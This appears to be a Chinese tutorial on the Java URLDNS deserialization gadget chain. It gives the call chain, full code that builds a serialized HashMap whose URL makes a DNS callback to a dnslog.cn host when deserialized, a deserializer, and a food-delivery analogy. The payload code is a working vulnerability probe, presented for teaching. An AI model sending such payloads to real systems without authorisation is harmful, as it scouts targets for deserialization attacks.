整个调用链
HashMap->readObject()
HashMap->hash()
URL->hachCode()
URLStreamHandler->hachCode()
URLStreamHandler->getHostAddress()
InetAddress.getByName()
序列化代码
public class dnsTest {
public static void main(String[] args) throws Exception {
HashMap hashMap = new HashMap<URL, Integer>();
URL url = new URL("http://jk5cy7.dnslog.cn");
Class c = URL.class;
Field fieldHashcode = c.getDeclaredField("hashCode");
fieldHashcode.setAccessible(true);
fieldHashcode.set(url, 233);
hashMap.put(url, 22);
fieldHashcode.set(url, -1);
Serialize(hashMap);
}
public static void Serialize(Object obj) throws Exception {
// 1.创建序列化流
ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.txt"));
// 2.写出对象
objectOutputStream.writeObject(obj);
// 3.释放资源
objectOutputStream.close();
}
}
反序列化代码
public class Deserialize {
public static void main(String[] args) throws Exception {
Deserialize();
}
public static void Deserialize() throws Exception{
ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("ser.txt"));
Object object = objectInputStream.readObject();
System.out.println("object = " + object);
objectInputStream.close();
}
}
整个调用链大白话的比喻的理解:
一家拉面店,不管点什么面都会送一个蛋,从未失误
小明喜欢吃面,每次都点他家的外卖(序列化)
一天小明让他弟弟帮他去拿外卖,他弟弟把蛋一口就吃掉了(反射修改值)
小明开吃(反序列化)时发现今天没有蛋,立马就知道了蛋被弟弟偷吃了(存在反序列化漏洞)